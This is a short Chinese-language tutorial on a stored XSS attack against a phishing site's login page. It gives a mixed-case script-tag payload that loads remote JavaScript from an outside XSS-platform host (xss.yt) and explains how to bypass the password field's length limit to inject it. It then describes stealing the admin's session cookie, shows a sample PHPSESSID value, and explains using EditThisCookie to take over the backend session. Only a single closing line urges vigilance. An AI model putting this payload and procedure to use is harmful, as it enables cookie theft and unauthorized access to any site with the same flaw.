注册XSS攻击平台
首先,我们需要在 XSS8 这个平台进行账号注册。
创建XSS攻击项目
完成注册后,我们可以创建一个项目,并选择超强默认模块,然后点击下一步。在这个页面,我们可以查看代码并复制以下代码:
1 | <sCRiPt sRC=//xss.yt/9Zgl></sCrIpT> |
这个代码的作用是将特殊的代码植入到目标网站的数据库中。
发起XSS攻击
接下来,我们需要在钓鱼网站上随便输入一个账号,并使用F12工具将密码框的最大长度改成很大。然后,将上述代码复制到密码栏内,并点击登录。等待一会儿,我们就能够获取到钓鱼网站的admin的cookie,例如:
1 | PHPSESSID=keaa336los93ss95fjuqqbori7 |
使用cookie登录到钓鱼网站后台
为了使用这个cookie登录到钓鱼网站的后台,我们可以使用 EditThisCookie 插件。将cookie添加到插件内后,刷新页面,即可成功登录到钓鱼网站的后台。
注意事项
这是一种比较简单的攻击方法,但是对于那些没有足够安全措施的网站来说,它依然是非常危险的。因此,我们需要时刻保持警惕,以免成为黑客的攻击目标。
